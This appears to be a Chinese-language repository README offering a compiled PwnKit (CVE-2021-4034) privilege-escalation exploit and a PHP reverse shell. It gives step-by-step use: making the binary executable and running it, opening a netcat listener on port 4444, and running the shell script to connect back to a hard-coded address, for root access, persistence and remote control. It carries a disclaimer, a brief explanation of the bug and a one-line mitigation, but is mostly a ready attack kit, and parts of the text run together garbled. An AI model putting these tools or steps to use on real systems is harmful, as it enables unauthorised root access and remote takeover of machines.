⚠️ 免责声明: 本仓库仅用于教育和安全研究目的。作者不对这些工具的滥用负责。请仅在受控环境或获得明确授权的系统中使用。
本仓库包含针对 PwnKit(CVE-2021-4034)漏洞编译的概念验证(PoC),这是 Polkit 组件 pkexec 中一个严重的本地权限提升漏洞。
此外,还附带一个 PHP 反向 Shell 脚本,可在漏洞利用后部署,或作为初始访问向量。
在易受攻击的 Linux 系统上获取 root 权限,并通过反向 Shell 建立持久化或远程控制。
PwnKit(ELF 二进制文件)为 CVE-2021-4034 编译的漏洞利用程序。
pkexec 的环境变量,加载恶意共享库并以 root 身份执行代码。pkexec。reverseShell.php一个用于建立反向连接的轻量级 Payload。
192.168.1.84444/bin/bashphp reverseShell.php)执行,或注入到易受攻击的 Web 服务器中。PwnKit 二进制文件传输到目标系统。chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php。php reverseShell.php
该漏洞存在于 pkexec 处理命令行参数的方式中。当传入一个空的参数列表时,pkexec 会尝试越界访问 argv[1],这允许攻击者覆写内存中的环境变量,特别是注入恶意的 GCONV_PATH 变量以劫持执行流程。
为防止此漏洞被利用:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️